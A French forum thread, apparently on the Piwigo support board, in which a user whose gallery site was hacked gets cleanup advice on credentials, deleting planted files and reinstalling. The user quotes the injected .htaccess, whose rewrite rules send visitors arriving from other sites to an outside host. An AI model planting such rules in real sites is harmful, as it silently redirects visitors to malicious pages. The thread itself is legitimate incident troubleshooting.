on devrait arriver sur quoi ? piwigo ou un accueil perso ?

je pense que vous vous etez fait hacké, vérifiez par FTP ce que vous avez comme fichiers

vous avez un lien quelconque avec adventurerabbi.com ? parce qu'a la première visite j'ai été redirigé chez eux (ensuite vers google)

mistic100 a écrit:

je pense que vous vous etez fait hacké, vérifiez par FTP ce que vous avez comme fichiers

C'est bien ce que je craignais.
Pendant mon absence j'ai eu trois fichier de modifié à la racine du site:
error_log
.htaccess
default.php

Et les dossiers suivants:
Tools
plugins
agb
install
galleries
language
doc
local
include
_vti_txt
_vti_pvt
_vti_cnf
_private

mistic100 a écrit:

est-ce que parmis les fichiers/dossier suivants il y en a que vous avec mit vous meme  ?
agb
_vti_txt
_vti_pvt
_vti_cnf
_private
default.php

quel est le contenu du htaccess ?

Non je n'ai rien touché depuis le 19/01, hors les dossiers sont indiqués modifiés le 28/01

Le fichier htaccess:

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/
$ [NC]

RewriteRule ^.*$ http://ptbshop.ionvin.net/eoai.html?h=1332454 [L,R]

</IfModule>

Dernière modification par Bouba (2013-01-30 20:49:32)

mistic100 a écrit:

bon alors dans l'ordre :
-changez vos mots de passe FTP, MySQL et administration de votre espace d'hébergement si ce n'est déjà fait
- supprimez les fichiers et dossier suscités (htaccess compris)
- téléchargez l'archive complète de Piwigo pour écraser tous les fichiers
- changez le mot de passe Piwigo

Ok, je me lance

mistic100 a écrit:

tout ça c'est en espérant qu'il n'ai pas corrompu la base de donnée puisqu'il avait manifestement accès au FTP (et donc aux identifiants)

d'ailleurs il faudra mettre à jour local/config/database.inc.php avec le nouveau mot de passe

Bon, j'ai essayé mais rien à faire. Je vais tout simplement refaire mon site.

En revanche, comment s'assurer que cela ne se reproduise pas ?

mistic100 a écrit:

ne pas stocker ses mdp n'importe ou, ne pas se connecter en FTP (pas secure du tout) depuis des ordinateurs publics et/ou sur lesquels il y a des malwares, etc.

des règles basiques de sécurité info en somme

Je n'ai rien fait de tout ça.
Mais je pense que le plus gros soucis était que j'avais le même mot de passe pour l'admin du site, le FTP et le base de donnée. Pas très fin je sais ..... cela me servira de leçon.

3 ans de boulot en fumée, j'ai les boules

Merci pour ton aide.

plg a écrit:

Demande à ton hébergeur de restaurer le site. Pour certains hébergeurs (comme Piwigo.com...) c'est pas très compliqué pour les administrateurs.

Je suis en contact avec eux, mais cela n'a pas l'air simple ...........